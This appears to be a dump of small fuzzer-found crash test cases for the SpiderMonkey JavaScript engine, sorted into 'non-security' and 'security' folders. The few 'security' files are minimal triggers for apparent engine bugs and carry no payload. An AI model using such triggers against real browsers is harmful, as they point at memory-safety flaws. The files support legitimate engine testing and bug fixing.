/js_tests/SpiderMonkey/non-security/48a9bdf1fa79a6e0e2b00934f3ef5f8d.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | "use asm"; 3 | function f() { 4 | return 0 5 | if (1) 0 6 | } 7 | })() -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/48b186c99e3bd510a08e9945d773719d.js: -------------------------------------------------------------------------------- 1 | new Function(` 2 | var TO = TypedObject; 3 | var PointType = new TO.StructType({x: TO.int32, y: TO.int32 }); 4 | function testPoint() { 5 | var p = new PointType(); 6 | var sub = Object.create(p); 7 | sub.x = 5; 8 | anonymous('minEmptyChunkCount') 9 | } 10 | testPoint(); 11 | `)(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/49f1a3cda162e2a3b7e5980275684e02.js: -------------------------------------------------------------------------------- 1 | 2 | serialize(evalcx("Set(['x', 'y'])")); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/4abf5e18f5044a68b694c370d0eac0cd.js: -------------------------------------------------------------------------------- 1 | oomAfterAllocations(1); 2 | read("x"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/4b27b9a03525a954911d57635e79a78a.js: -------------------------------------------------------------------------------- 1 | 2 | print("\uDBFF\uDFFF"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/4b8c361292b81aed875211a1d42025d6.js: -------------------------------------------------------------------------------- 1 | for(i=0;i<100;++i) 2 | evalInWorker('enableGeckoProfiling()'); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/4ccee4930248e16fbca5a4a1c3f2ecc8.js: -------------------------------------------------------------------------------- 1 | class base {} 2 | class derived extends base { 3 | constructor() { 4 | try { 5 | return; 6 | } catch (e) { 7 | try { 8 | return; 9 | } catch (e) {} 10 | } 11 | } 12 | } 13 | new derived; -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/4f40a8975593d73a3d551c9bff7beb32.js: -------------------------------------------------------------------------------- 1 | evalInCooperativeThread('cooperativeYield(); var dbg = new Debugger();'); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/53515406cdca19199992c42b347c163c.js: -------------------------------------------------------------------------------- 1 | 2 | gcparam("maxBytes", gcparam("gcBytes") + 4*1024); 3 | function foo() { 4 | var re = /erwe/; 5 | foo(re.multiline); 6 | } 7 | foo(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/5397fbecb8f6f1b35614f67e163406fe.js: -------------------------------------------------------------------------------- 1 | 2 | gcparam('markStackLimit', .4 ); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/543eb522a3bdad0650ed6c2eb76de1c1.js: -------------------------------------------------------------------------------- 1 | Function.prototype.toString = function() this(new Int8Array); 2 | lfLogBuffer = "getBacktrace({ thisprops: true })"; 3 | readline = "" 4 | loadFile(lfLogBuffer); 5 | function loadFile(lfVarx) evaluate(lfVarx) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/58e41fb7d9c7487d61e45962c8e0c1ee.js: -------------------------------------------------------------------------------- 1 | var evalInFrame = (function (global) { 2 | var dbgGlobal = newGlobal(); 3 | var dbg = new dbgGlobal.Debugger(); 4 | return function evalInFrame(upCount, code) { 5 | dbg.addDebuggee(global); 6 | var frame = dbg.getNewestFrame().older; 7 | for (var i = 0; i < upCount; i++) { 8 | if (!frame.older) 9 | break; 10 | frame = frame.older; 11 | } 12 | var completion = frame.eval(code); 13 | }; 14 | })(this); 15 | Object.defineProperty(this, "fuzzutils", { 16 | }); 17 | var lfCodeBuffer = ""; 18 | var lfGlobalFunc = undefined; 19 | var lfModule = new WebAssembly.Module(wasmTextToBinary(` 20 | (module 21 | (import "global" "func" (result i32)) 22 | (func (export "func_0") (result i32) 23 | call 0 ;; calls the import, which is func #0 24 | ) 25 | ) 26 | `)); 27 | for (i = 0; i < 20; ++i) 28 | processCode(` 29 | evalInFrame(1, "a = 43"); 30 | `); 31 | function processCode(lfVarx) { 32 | try { 33 | processModule(lfModule, lfVarx); 34 | } catch (lfVare) {} 35 | } 36 | function processModule(module, jscode) { 37 | imports = {} 38 | for (let descriptor of WebAssembly.Module.imports(module)) { 39 | imports[descriptor.module] = {} 40 | if (lfGlobalFunc) {} else { 41 | imports[descriptor.module][descriptor.name] = new Function("x", "y", "z", jscode); 42 | try { 43 | instance = new WebAssembly.Instance(module, imports); 44 | } catch (exc) {} 45 | } 46 | } 47 | for (let descriptor of WebAssembly.Module.exports(module)) { 48 | switch (descriptor.kind) { 49 | case "function": 50 | print(instance.exports[descriptor.name]()) 51 | } 52 | } 53 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/5c9356279cd3d4ff17b0b178339dbb6f.js: -------------------------------------------------------------------------------- 1 | for (var [...y] in Object) {} -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6934c9ed5cf8de5ddf97e38cde1e7986.js: -------------------------------------------------------------------------------- 1 | var length = 4294967295; 2 | var array = new Array(length); 3 | array.splice(100); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6b346621415579ad3d469fb40a927993.js: -------------------------------------------------------------------------------- 1 | (x => { 2 | "use asm" 3 | return {} 4 | })() -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6be281da01a445179d9052562e6b550c.js: -------------------------------------------------------------------------------- 1 | function entryFrame_1(d) { 2 | assertJitStackInvariants(); 3 | } 4 | for (i = 0Xa; i < 40; i++) { 5 | new entryFrame_1(); 6 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6c072232542a68dca4a56a4602dbc686.js: -------------------------------------------------------------------------------- 1 | try { 2 | (function() { 3 | x = Proxy.createFunction((function() { 4 | return { 5 | defineProperty: function() {}, 6 | delete: function() {}, 7 | enumerate: undefined, 8 | fix: function() {}, 9 | get: function() {}, 10 | getOwnPropertyDescriptor: function() {}, 11 | getOwnPropertyNames: Uint16Array, 12 | g: function() {}, 13 | s: function() {}, 14 | a: function() {}, 15 | iterate: arguments.callee.caller, 16 | s: function() {}, 17 | t: function() {} 18 | } 19 | })(), String.prototype.toSource) 20 | })() 21 | for (let d in [])(function() { 22 | _(function() { 23 | return { 24 | defineProperty: function() {}, 25 | delete: function() {}, 26 | enumerate: d, 27 | fix: c, 28 | get: function() {}, 29 | getOwnPropertyDescriptor: function() {}, 30 | getOwnPropertyNames: c, 31 | r: function() {}, 32 | s: function() {}, 33 | n: function() {}, 34 | e: f, 35 | s: c, 36 | t: n 37 | } 38 | }) 39 | })() 40 | } catch (e) {} 41 | try { 42 | (function() { 43 | for (c in x)(a((function() { 44 | return { 45 | defineProperty: function() {}, 46 | delete: l, 47 | enumerate: function() {}, 48 | fix: function() {}, 49 | get: o, 50 | getOwnPropertyDescriptor: function() {}, 51 | getOwnPropertyNames: c, 52 | r: function() {}, 53 | s: function() {}, 54 | n: f, 55 | e: d, 56 | s: function() {}, 57 | t: function() {} 58 | } 59 | })(let(l) e)(c, "")))((function() { 60 | return { 61 | defineProperty: d, 62 | delete: d, 63 | enumerate: function() {}, 64 | fix: function() {}, 65 | get: function() {}, 66 | getOwnPropertyDescriptor: function() {}, 67 | getOwnPropertyNames: d, 68 | g: function() {}, 69 | s: function() {}, 70 | a: function() {}, 71 | e: d, 72 | s: c, 73 | t: function() {} 74 | } 75 | }))(function() { 76 | ((((function() { 77 | return { 78 | defineProperty: c, 79 | delete: function() {}, 80 | enumerate: function() {}, 81 | fix: d, 82 | get: function() {}, 83 | getOwnPropertyDescriptor: f, 84 | getOwnPropertyNames: function() {}, 85 | r: d, 86 | s: function() {}, 87 | n: c, 88 | e: function() {}, 89 | s: d, 90 | t: function() {} 91 | } 92 | }((b)))))) 93 | (((function() { 94 | return { 95 | defineProperty: f, 96 | delete: function() {}, 97 | enumerate: c, 98 | fix: function() {}, 99 | get: function() {}, 100 | getOwnPropertyDescriptor: c, 101 | getOwnPropertyNames: function() {}, 102 | r: f, 103 | s: function() {}, 104 | n: function() {}, 105 | e: function() {}, 106 | s: function() {}, 107 | t: c 108 | } 109 | })(), function() {})) 110 | })((function() { 111 | return { 112 | defineProperty: function() {}, 113 | delete: function() {}, 114 | enumerate: g, 115 | fix: f, 116 | get: function() {}, 117 | getOwnPropertyDescriptor: function() {}, 118 | getOwnPropertyNames: function() {}, 119 | r: function() {}, 120 | s: function() {}, 121 | a: o, 122 | e: function() {}, 123 | s: function() {}, 124 | t: function() {} 125 | } 126 | }(undefined)), s) 127 | })() 128 | } catch (e) {} -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6ec218b2bd88ee1f4d56c9bf62289f01.js: -------------------------------------------------------------------------------- 1 | // Randomly chosen test: js/src/tests/ecma_5/Date/fractions.js 2 | Date(); 3 | // Randomly chosen test: js/src/jit-test/tests/basic/bug623859.js 4 | try { 5 | gcparam("maxBytes", gcparam("gcBytes") + 1); 6 | eval("\ 7 | var a = [];\ 8 | for (var i = 0; i < 99999; ++i) {\ 9 | a[i] = [];\ 10 | }\ 11 | ") 12 | } catch (e) {} 13 | // Randomly chosen test: js/src/jit-test/tests/ion/inlining/TypedObject-storage-transparent.js 14 | if (TypedObject) {}; -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6fa21680e88c64b2a16bafd6555e674a.js: -------------------------------------------------------------------------------- 1 | offThreadCompileModule("export { x };"); 2 | finishOffThreadModule(); 3 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/6fb9b2a9398add2905d69cb5c01d4a54.js: -------------------------------------------------------------------------------- 1 | function lfEvalInCache(lfCode, lfIncremental = false, lfRunOnce = false) { 2 | let ctx = {}; 3 | let code = cacheEntry(lfCode); 4 | ctx_save = Object.create(ctx, { saveIncrementalBytecode: { value: true } }); 5 | try { evaluate(code, ctx_save); } catch(exc) {} 6 | try { evaluate(code, Object.create(ctx_save, { loadBytecode: { value: true } })); } catch(exc) {} 7 | } 8 | lfEvalInCache(` 9 | function q() {} 10 | Object.freeze(this); 11 | `, false, true); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/70ae37ec4d612495d36742f72ff893f9.js: -------------------------------------------------------------------------------- 1 | low = high = newGlobal({}) 2 | high.low = low 3 | high.eval("function a() { return saveStack(1, low) }") 4 | set = eval("high.a()") 5 | serialize(set) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/73d68f3ed37e27854cc93e72c3525cf1.js: -------------------------------------------------------------------------------- 1 | (function(stdlib) { 2 | "use asm" 3 | var abs = stdlib.Math.abs 4 | function f() { 5 | return 6 | (abs(0) | 0) 7 | } 8 | })() -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/756478befa3c198e175d6d9024ad8c49.js: -------------------------------------------------------------------------------- 1 | Array.prototype[Symbol.iterator] = function() { 2 | for (var i = 3; --i >= 0;) { 3 | yield this[i] 4 | } 5 | } 6 | new TypedObject.ArrayType(TypedObject.int32, 0).build(x => 1) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/7ff2f22584cbcf9bacef207a363dcb8d.js: -------------------------------------------------------------------------------- 1 | var format = new Intl.NumberFormat("it-IT", { 2 | minimumFractionDigits: -0 3 | }); 4 | format.format(1123123123123123123123.1); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/80f41ae8f713dba701d963b1baafdda7.js: -------------------------------------------------------------------------------- 1 | testcase(); 2 | function testcase() { 3 | var tokenCodes = { 4 | get try() { 5 | super.actual(); 6 | } 7 | }; 8 | var arr = [ 9 | 'try', 10 | ]; 11 | for (var i = 0; i < arr.length; i++) { 12 | if (tokenCodes[arr[i]] !== i) {}; 13 | } 14 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/810d408bdcec45dfe4bda2c4ab64320f.js: -------------------------------------------------------------------------------- 1 | function Thing(a, b) { 2 | this.a = a; 3 | } 4 | var array = []; 5 | for (var i = 0; i < 10000; i++ ) 6 | array.push(new Thing(i, i + 1) 7 | ); 8 | var proto = new Thing(); 9 | var obj = Object.create(proto); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/84b11ee01ec92543f4011353e650bacc.js: -------------------------------------------------------------------------------- 1 | x = Array(4294967295); 2 | x[1] = 0; 3 | Array.prototype.shift.call(x); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/8c8488b5d79804f2fccc433e9d3cc3ec.js: -------------------------------------------------------------------------------- 1 | 2 | var g = newGlobal(); 3 | function cloneableFunction(body) { 4 | 'use asm'; 5 | function _main() {} 6 | return _main; 7 | } 8 | g.f = cloneableFunction('return function(x) { return x };'); 9 | g.eval("clone(f)()") -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/952e1b2eafcb597e31f8a2de2d734c12.js: -------------------------------------------------------------------------------- 1 | 2 | gczeal(4,1); 3 | var N = 100; 4 | function basic(out) { 5 | for (var i = 0; i < N; i++) { 6 | var arr = [0, 1, 2, 3, 4]; 7 | arr.length = 6; 8 | } 9 | } 10 | basic(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/963b25ca02b044015f61e1c4c6db0916.js: -------------------------------------------------------------------------------- 1 | (function(global) { 2 | var dump = global.dump; 3 | global.dump = dump; 4 | })(this); 5 | var gTestcases = new Array(); 6 | function TestCase(n, d, e, a) { 7 | ({}).constructor.defineProperty(gTestcases, gTc++, { 8 | value: this, 9 | }); 10 | TestCase.prototype.dump = function() { 11 | dump('\njstest: ' + this.path + ' ' + 'reason: ' + toPrinted(this.reason) + '\n'); 12 | } 13 | } 14 | function toPrinted(value) { 15 | value = String(value); 16 | value = value.replace(/\\n/g, 'NL') 17 | } 18 | for (gTc = 0; gTc < gTestcases.length; gTc++) {} 19 | function jsTestDriverEnd() { 20 | for (var i = 0; i < gTestcases.length; i++) { 21 | gTestcases[i].dump(); 22 | } 23 | } 24 | var SECTION = "11.4.7"; 25 | new TestCase(SECTION, "-('')", -0, -("")); 26 | 5 * (this) + delete RegExp.prototype.flags + (0.0).toLocaleString() + (this); 27 | jsTestDriverEnd(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/9b7fc6a45db19397c12a57887377a600.js: -------------------------------------------------------------------------------- 1 | lfLogBuffer = ` 2 | var module = new WebAssembly.Module(wasmTextToBinary(\`(module (func ))\`)); 3 | wasmExtractCode(module); 4 | `; 5 | loadFile(); 6 | loadFile(); 7 | function loadFile() 8 | oomTest(Function(lfLogBuffer)) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/aa39434f87686585d5eb4824c51ef8f7.js: -------------------------------------------------------------------------------- 1 | var lfcode = new Array(); 2 | lfcode.push = loadFile; 3 | oomAfterAllocations(50, 2); 4 | lfcode.push(` 5 | "use asm"; 6 | function f() { 7 | return +pow(.0, .0) 8 | `); 9 | function loadFile(lfVarx) { 10 | eval("(function() { " + lfVarx + " })();"); 11 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/aa394e92a49e1396edbb12a861d962c9.js: -------------------------------------------------------------------------------- 1 | function eval(source) { 2 | offThreadCompileModule(source); 3 | } 4 | var N = 10000; 5 | var left = repeat_str('(1&', N); 6 | var right = repeat_str(')', N); 7 | var str = 'actual = '.concat(left, '1', right, ';'); 8 | eval(str); 9 | function repeat_str(str, repeat_count) { 10 | var arr = new Array(--repeat_count); 11 | while (repeat_count != 0) arr[--repeat_count] = str; 12 | return str.concat.apply(str, arr); 13 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ab237933a8288bbad572cc71d1ea90aa.js: -------------------------------------------------------------------------------- 1 | 2 | setObjectMetadataCallback(function(obj) {}); 3 | eval(uneval({'-1':true})); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ac14bbef904fdc3f384d71a1c657b56d.js: -------------------------------------------------------------------------------- 1 | (function(m) { 2 | "use asm" 3 | var k = m.SIMD.Bool32x4 4 | function f() { 5 | var x = k(0, 0, 0, 0) 6 | frd(x); 7 | } 8 | }); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ae7697e0cd939a469f0674fb224a9b60.js: -------------------------------------------------------------------------------- 1 | var dbg = new Debugger; 2 | dbg.onNewGlobalObject = function(global) {}; 3 | evalInCooperativeThread("var x = 3"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/af8d7a74b9c267111a1633122adf5b43.js: -------------------------------------------------------------------------------- 1 | a => {} 2 | /x/; -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b06a3ef5822daf6e010e750f00daa5f0.js: -------------------------------------------------------------------------------- 1 | gcparam("maxBytes", gcparam("gcBytes") + 0xcdb *1024); 2 | var TO = TypedObject; 3 | var PointType = new TO.StructType({x: TO.int32, y: TO.int32}); 4 | var LineType = new TO.StructType({from: PointType, to: PointType}); 5 | function testBasic(how) { 6 | var line = new LineType(); 7 | var to = line.to; 8 | TO.storage(to).buffer.expando = "hello"; 9 | } 10 | for (var i = 0; 7; i++) 11 | testBasic(0); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b10c59e1e5b5d9dbc95ec0a433ce63cf.js: -------------------------------------------------------------------------------- 1 | makeFinalizeObserver("nursery").bind({ 2 | get 3 | 7() 4 | eval() 5 | }) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b1dd9acf148be510ff9b67367a7d6873.js: -------------------------------------------------------------------------------- 1 | gczeal(10); 2 | var TO = TypedObject; 3 | var PointType = new TO.StructType({}); 4 | var LineType = new TO.StructType({ from: PointType, }); 5 | var line = new LineType(); 6 | var from = line.from; 7 | var dataview = new DataView(TO.storage(from).buffer); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b366bdebc96b1cb053c3bc049666000a.js: -------------------------------------------------------------------------------- 1 | offThreadCompileScript(` 2 | [null, "", ""].forEach(function(locales) { 3 | try { 4 | Intl.NumberFormat(locales) 5 | } catch (e) {} 6 | oomAfterAllocations(100); 7 | }) 8 | `); 9 | runOffThreadScript() -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b545df65432c21338e122a5ca62e6727.js: -------------------------------------------------------------------------------- 1 | class get { 2 | static constructor() {}; 3 | constructor() {} 4 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b5ad63aa3d2817e43cff9be02c4b815c.js: -------------------------------------------------------------------------------- 1 | function ax(f) f(); 2 | function test_one(pattern, val) { 3 | eval(` 4 | function* g${0} 5 | (${pattern}) {} 6 | [g${0}(${"[]"})] 7 | `); 8 | } 9 | function test(expr) { 10 | pattern = `[a=${expr}]`; 11 | test_one(pattern); 12 | } 13 | test(`class E {[ ax(() => TypeError)]() {}}`); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b759c3b04bd7268d45053eb0a754a41e.js: -------------------------------------------------------------------------------- 1 | Object.defineProperty(wrap(Int16Array(4)), 1, ({})) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b997dd70239c5f60fc26146b8a6f057e.js: -------------------------------------------------------------------------------- 1 | parseModule("await 0") 2 | -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/b9ea5b5212e2e36d2d0a6afe46a3bb2f.js: -------------------------------------------------------------------------------- 1 | gczeal(15, 5); 2 | offThreadCompileScript(""); 3 | gc(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/bc491314668e02e6061a5d23c6ef9ecd.js: -------------------------------------------------------------------------------- 1 | lfcode = Array(` 2 | Function.prototype.toString = function() this(new Proxy([], {get() { return 0; } })); 3 | getBacktrace({ 4 | thisprops: 1 5 | }) 6 | `) 7 | readline = file = lfcode.shift(); 8 | loadFile(file); 9 | function loadFile(lfVarx) { 10 | evaluate(lfVarx); 11 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/bd5b8c5045f72aa3a958bed412150793.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | "use asm" 3 | var x = undefined.undefined.undefined 4 | })() -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/c3411abd52e80a4852c47eff6f88e151.js: -------------------------------------------------------------------------------- 1 | loadFile(""); 2 | loadFile(""); 3 | loadFile("Array.prototype.splice.call(1)"); 4 | function loadFile(lfVarx) { 5 | parseInt("1"); 6 | oomTest(function() { 7 | eval(lfVarx); 8 | }); 9 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/cce45cb9fbd0a50fbb9454371eaeff5b.js: -------------------------------------------------------------------------------- 1 | Object.defineProperty(Object.prototype, 0, { 2 | set: function() {} 3 | }); 4 | function checkDisplayNames(names, expected) {} 5 | addIntlExtras(Intl); 6 | let gDN = Intl.getDisplayNames; 7 | checkDisplayNames(gDN('ar', { 8 | keys: ['dates/fields/month', ] 9 | }), {}); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/cf5a9bd4ab3f43817e5f879c65968627.js: -------------------------------------------------------------------------------- 1 | evalInCooperativeThread(` 2 | evalcx("b"); 3 | `); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/d01bb9eac933876ff295ca823cbc4448.js: -------------------------------------------------------------------------------- 1 | var a = Object.freeze([4, 5, 1]); 2 | a.watch("x", function(id, oldval, newval) {}); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/d03ec466f441b5e88536f67ee1d7589b.js: -------------------------------------------------------------------------------- 1 | var g = newGlobal(); 2 | g.offThreadCompileScript("setObjectMetadataCallback('a'); var s = [];"); 3 | g.runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/d0d679a3657f7dd9623eb5bd482ad093.js: -------------------------------------------------------------------------------- 1 | enableGeckoProfiling(); 2 | evaluate(` 3 | evalInCooperativeThread(\` 4 | setInterruptCallback(function() { 5 | cooperativeYield(); 6 | }); 7 | interruptIf(true); 8 | \`); 9 | `); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/d5eac0c5bb2fc7e835052071c8f464f1.js: -------------------------------------------------------------------------------- 1 | ({ 2 | "0" 3 | () 4 | eval() 5 | }) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/db372fc4453e42c53da4aa89e08f2c58.js: -------------------------------------------------------------------------------- 1 | var desc = { 2 | element: "anyfunc", 3 | }; 4 | var proxy = new Proxy({}, { 5 | has: true 6 | }); 7 | Object.setPrototypeOf(desc, proxy); 8 | let table = new WebAssembly.Table(desc); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/df82bb4b6b094c6840c2e145538c2147.js: -------------------------------------------------------------------------------- 1 | g = (function(t, foreign) { 2 | "use asm"; 3 | var ff = foreign.ff; 4 | function f() { 5 | ff() 6 | } 7 | return f 8 | })(this, { 9 | ff: -0 || (this) ? inIon : a &= () => test() 10 | }) 11 | function m(f) { 12 | while (true) { 13 | f(); 14 | } 15 | } 16 | m(g); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/e5a3f760014e026d3d553ee1d7a5eae4.js: -------------------------------------------------------------------------------- 1 | gczeal(13); 2 | var g = newGlobal(); 3 | var dbg = Debugger(g); 4 | dbg.onDebuggerStatement = function (frame) { 5 | var env = frame.environment.find("x"); 6 | }; 7 | g.eval("with (Object.create({})) { debugger; }"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/e8dba4cc3d207b9733d091a52099d943.js: -------------------------------------------------------------------------------- 1 | Reflect.parse("(function() { class a { constructor() { } static get p() it: missing or incorrect StopIteration"); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ea2f3ad34565e4ddfac0abe35b2f70f7.js: -------------------------------------------------------------------------------- 1 | var i1 = SIMD.Int32x4(); 2 | var uint32 = TypedObject.uint32; 3 | function fromOneDimArrayOfUint8ToUint32s() { 4 | var type = uint32.array(4); 5 | var r1 = type.from(i1, j => j*2); 6 | } 7 | fromOneDimArrayOfUint8ToUint32s(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ebaa88fd5e22024b4d7c4f74d5ec4c80.js: -------------------------------------------------------------------------------- 1 | evalInCooperativeThread("var x = 3"); 2 | let PromiseCtor = Promise; 3 | let promises = []; 4 | let p = new PromiseCtor(function(res_, rej_) {}); 5 | promises.push(p); 6 | let allPromise = getWaitForAllPromise(promises); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ed362efcc02a46b54820cf70c7124579.js: -------------------------------------------------------------------------------- 1 | addIntlExtras(Intl); 2 | addIntlExtras(Intl); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/f1f31f7e62f0ae0d7602e8939bd15a39.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | str1 = ''; 3 | for (i in this) {} 4 | } 5 | if (!f()) {} 6 | createMappedArrayBuffer(str1, i, createMappedArrayBuffer); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/f214bfab1815347651036b8650d5c10e.js: -------------------------------------------------------------------------------- 1 | offThreadCompileScript(` 2 | oomTest(() => "".search(/d/)); 3 | fullcompartmentchecks(3); 4 | `); 5 | runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/f558c9579eea68dcd5a74c6c1b18c07b.js: -------------------------------------------------------------------------------- 1 | loadFile(` 2 | disassemble(function() { 3 | return assertDeepEq(x.concat(obj), [1, 2, 3, "hey"]); 4 | }) 5 | `); 6 | function loadFile(lfVarx) { 7 | oomTest(new Function(lfVarx)); 8 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/f843c3b8dac85b5a5116128cdfeface4.js: -------------------------------------------------------------------------------- 1 | try { 2 | (async function f() {})([], 1); 3 | const Module = WebAssembly.Module; 4 | const Instance = WebAssembly.Instance; 5 | const m1 = new Module(wasmTextToBinary(`(module (func $f) (export "f" $f))`)); 6 | const m2 = new Module(wasmTextToBinary(`(module (import "a" "f") (func $f) (export "g" $f))`)); 7 | var i1 = new Instance(m1); 8 | var i2 = new Instance(m2, {a:i1.exports}); 9 | var g = i2.exports.g; 10 | (async function f() { 11 | var inner = (function testmath() { 12 | return g.caller; 13 | })(); 14 | })([], 1); 15 | } catch(exc) {} -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/f9d411bbf22e136381144687ae174fab.js: -------------------------------------------------------------------------------- 1 | eval("\ 2 | \"use strict\";\ 3 | let (a) {\ 4 | (function() {\ 5 | a = c\ 6 | })\ 7 | }\ 8 | ") -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/fd3614cc773a1e38fcf7d4b5e1436d59.js: -------------------------------------------------------------------------------- 1 | gczeal(4); 2 | evalInCooperativeThread('\ 3 | for (var i = 0; i < 10; i++) {\ 4 | interruptIf(true);\ 5 | }\ 6 | '); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/fe7c10a79991c4b089324459ac1c083c.js: -------------------------------------------------------------------------------- 1 | var evalInFrame = (function (global) { 2 | var dbgGlobal = newGlobal(); 3 | var dbg = new dbgGlobal.Debugger(); 4 | return function evalInFrame(upCount, code) { 5 | dbg.addDebuggee(global); 6 | var frame = dbg.getNewestFrame().older; 7 | var completion = frame.eval(code); 8 | }; 9 | })(this); 10 | var x = 5; 11 | let (x = eval("x++")) { 12 | evalInFrame(0, ("for (var x = 0; x < 3; ++x) { (function(){})() } ")) 13 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/non-security/ff908a12e38b85e2867ed9d26abbe4da.js: -------------------------------------------------------------------------------- 1 | function set(stdlib, foreign, heap) { 2 | "use asm"; 3 | var ffi = foreign.t; 4 | return {}; 5 | } 6 | set(15, 10); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/05d7ff5164675ae926f87c88b45b78e7.js: -------------------------------------------------------------------------------- 1 | with(startTest){ 2 | for(var TITLE=0 in startTest) 3 | SECTION('huh'); 4 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/0da7571c7da906b8eea7bf08da38deb6.js: -------------------------------------------------------------------------------- 1 | 2 | evaluate("\ 3 | for ( var time = 0, year = 1969; year >= 0; year-- )\ 4 | time -= TimeInYear(year);\ 5 | function TimeInYear( y ) {}\ 6 | gczeal(4);\ 7 | ", { noScriptRval : true }); 8 | evaluate("setObjectMetadataCallback();", { noScriptRval : true }); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/171403d46f39cf2c40d54dc82dd1e8c2.js: -------------------------------------------------------------------------------- 1 | 2 | while (true) { 3 | foo("0"); 4 | } 5 | function foo(s) { 6 | s.charAt(0); 7 | Number(s.charAt(-2147483648)); 8 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/1ca241661670296fdb22be5140d1cd64.js: -------------------------------------------------------------------------------- 1 | var lfGlobal = newGlobal(); 2 | var src = "var obj = {"; 3 | for (var i = 0; i < 140; ++i) { 4 | src += "prop" + i + ": 2,"; 5 | } 6 | src += "}; {"; 7 | lfGlobal.offThreadCompileScript(src); 8 | lfGlobal.runOffThreadScript(); -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/2f968ffed92c8da111409670f4859ae8.js: -------------------------------------------------------------------------------- 1 | for(var e=1.2; e<10000; e++) { 2 | if (new (function (c) { eval("var y"); })) 3 | var y=2; 4 | } -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/3d156fe0f93604acae02bad218bf1ff6.js: -------------------------------------------------------------------------------- 1 | function x() {} 2 | ParallelArray(3385, function(y) { 3 | Object.defineProperty([], 8, { 4 | e: (y ? x : Math.fround(1)) 5 | }) 6 | }) -------------------------------------------------------------------------------- /js_tests/SpiderMonkey/security/45303d3d8ed370a5636b9b7ab41408df.js: -------------------------------------------------------------------------------- 1 | setGCCallback({ 2 | action: "majorGC", 3 | }); 4 | schedulegc(this) 5 | 